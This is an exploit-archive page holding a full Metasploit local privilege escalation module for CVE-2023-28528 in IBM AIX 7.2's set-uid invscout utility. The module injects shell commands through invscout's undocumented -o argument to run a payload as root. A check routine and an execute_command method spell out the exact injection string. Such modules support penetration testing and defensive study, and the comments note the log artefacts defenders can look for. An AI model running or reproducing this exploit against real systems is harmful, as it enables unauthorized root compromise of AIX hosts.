IBM AIX 7.2 invscout Privilege Escalation

2023.05.20
Credit: Tim Brown
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation against the set-uid root invscout utility on
# IBM AIX 7.2 and earlier (CVE-2023-28528, per the References below).
# The module passes an attacker-controlled string through invscout's
# undocumented -RPM/-o arguments; the -o string reaches the rpm utility
# without validation, so a shell command embedded in it runs with
# effective uid 0. execute_command holds the exact invocation.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata plus the single INVSCOUT_PATH option.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'invscout RPM Privilege Escalation',
        # NOTE(review): this text spells the argument -rpm while execute_command
        # below uses -RPM; one of the two should be aligned with the other.
        'Description' => %q{ This module exploits a command injection vulnerability in IBM AIX invscout set-uid root utility present in AIX 7.2 and earlier. The undocumented -rpm argument can be used to install an RPM file; and the undocumented -o argument passes arguments to the rpm utility without validation, leading to command injection with effective-uid root privileges. This module has been tested successfully on AIX 7.2. },
        'Author' => [
          'Tim Brown', # Discovery and PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['CVE', '2023-28528'],
          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],
        ],
        'Platform' => %w[unix aix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          # The payload is embedded inside a double-quoted -o argument (see
          # execute_command), so NUL, LF, CR and the double quote itself must
          # not appear in it.
          'BadChars' => "\x00\x0a\x0d\x22",
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet openssl'
          }
        },
        'DefaultOptions' => {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork' => true
        },
        'SessionTypes' => %w[shell meterpreter],
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-04-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # The module does nothing to hide its activity: the complete invscout
          # command line, injected string included, is what host logging would
          # capture and is the artefact defenders should look for.
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options([
      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])
    ])
  end

  # Path of the invscout binary, read from the INVSCOUT_PATH option.
  def invscout_path
    datastore['INVSCOUT_PATH']
  end

  # Vulnerability check. Returns Safe when the binary is not executable;
  # otherwise runs `id` through the same injection path the exploit uses and
  # reports Vulnerable only if the captured line contains euid=0. Note that
  # the check itself already invokes the set-uid binary on the target, so it
  # leaves the same log footprint as the exploit.
  def check
    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)

    res = execute_command('id')
    # First line of output that contains "uid=" (empty string if none).
    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s
    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')

    CheckCode::Vulnerable("Output: #{id}")
  end

  # Runs `cmd` via the invscout -o injection and returns its output.
  # rpm_path is a random .rpm file name that this module never creates;
  # the -o string terminates rpm's argument with `;`, runs cmd, and the
  # trailing `echo ` is presumably there to swallow whatever rpm appends.
  # _opts is accepted for interface compatibility and not used.
  def execute_command(cmd, _opts = {})
    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"
    rpm_args = "; #{cmd}; echo "
    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")
    vprint_line(res) unless res.blank?
    res
  end

  # Delivers the encoded payload through execute_command.
  def exploit
    execute_command(payload.encoded)
  end
end

